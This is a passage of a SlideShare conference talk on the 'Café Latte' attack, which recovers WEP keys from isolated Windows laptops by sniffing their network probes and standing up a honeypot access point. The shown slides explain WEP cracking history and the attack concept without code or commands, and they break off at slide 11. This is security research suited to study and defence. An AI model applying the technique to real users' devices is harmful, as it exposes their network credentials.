Cafe Latte


Published on

Published in: Technology
1 Like
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Cafe Latte

  1. 1. Vivek Ramachandran MD Sohail Ahmad Cafe Latte with a Free Topping of Cracked WEP - Retrieving WEP Keys From Road-Warriors
  2. 2. Talk Outline <ul><li>WEP Cracking – a quick primer </li></ul><ul><li>Debunking the myths of WEP Cracking – Café Latte </li></ul><ul><li>Café Latte - Attack Background </li></ul><ul><li>Café Latte – Detailed Analysis </li></ul><ul><li>Countermeasures against Café Latte </li></ul><ul><li>Conclusions </li></ul><ul><li>Q&A </li></ul>
  3. 3. Cracks in WEP -- Historic Evolution 2001 - The insecurity of 802.11, Mobicom, July 2001 N. Borisov, I. Goldberg and D. Wagner. 2001 - Weaknesses in the key scheduling algorithm of RC4. S. Fluhrer, I. Mantin, A. Shamir. Aug 2001. 2002 - Using the Fluhrer, Mantin, and Shamir Attack to Break WEP A. Stubblefield, J. Ioannidis, A. Rubin. 2004 – KoreK, improves on the above technique and reduces the complexity of WEP cracking. We now require only around 500,000 packets to break the WEP key. 2005 – Adreas Klein introduces more correlations between the RC4 key stream and the key. 2007 – PTW extend Andreas technique to further simplify WEP Cracking. Now with just around 60,000 – 90,000 packets it is possible to break the WEP key. Is there really a need for a New Attack?
  4. 4. Limitations of the traditional WEP Cracking <ul><li>The attacker needs to be in the RF vicinity of the WEP network </li></ul><ul><li>The authorized network should have at least one AP up and running which the Clients can connect to </li></ul>Client AP Hacker
  5. 5. An example scenario where traditional approaches fail <ul><li>An isolated Client far away from the authorized network </li></ul>Hacker Victim <ul><li>This Client has a WEP encrypted network “Toorcon” in its PNL </li></ul><ul><li>Can we crack the WEP key of “Toorcon” using only this Client? </li></ul><ul><li>Can we have an IP layer connectivity with this Client? </li></ul>WEP Cracking Fails!! Café Latte Attack to the rescue!
  6. 6. What is the Café Latte Attack? <ul><li>We attack the Client to retrieve the WEP key </li></ul><ul><li>The Client can be absolutely isolated and nowhere near the authorized network </li></ul><ul><li>There is no need for an authorized network AP </li></ul>Hacker Client Moon No AP needed
  7. 7. Before we begin – a quick 101!
  8. 8. Attack Background – Windows Wireless Configuration Manager User connects to a WEP protected network “Default” for the first time User enters the WEP key when prompted by the Windows wireless utility “ Default” gets added into the preferred network list (PNL) of the configuration manager
  9. 9. Attack Background - Conclusions <ul><li>Windows stores the SSID and the WEP key in its Preferred Network List (PNL) </li></ul><ul><li>Question: </li></ul><ul><li>Can we retrieve the WEP key from this Client e.g. at a Coffee Shop? </li></ul><ul><li>Answer: </li></ul><ul><li>Café Latte Attack </li></ul>
  10. 10. Can we crack WEP with just an isolated Client? <ul><li>To crack WEP we need a large number of encrypted data packets </li></ul><ul><ul><ul><li>90k for PTW </li></ul></ul></ul><ul><ul><ul><li>500k for Korek+FMS </li></ul></ul></ul><ul><li>It does not matter which device produces these packets – Client or AP </li></ul><ul><li>Is it possible to make the Client produce data packets without connecting to the authorized network’s AP? </li></ul>Client
  11. 11. Café Latte - How does it work? <ul><li>Client probes for SSID “Default” </li></ul><ul><li>Hacker sniffs these probes and brings up a Honeypot </li></ul><ul><li>Client Authenticates and Associates with this Honeypot </li></ul><ul><li>Fake Authentication and Association works because WEP does not have mutual Authentication </li></ul>Default Default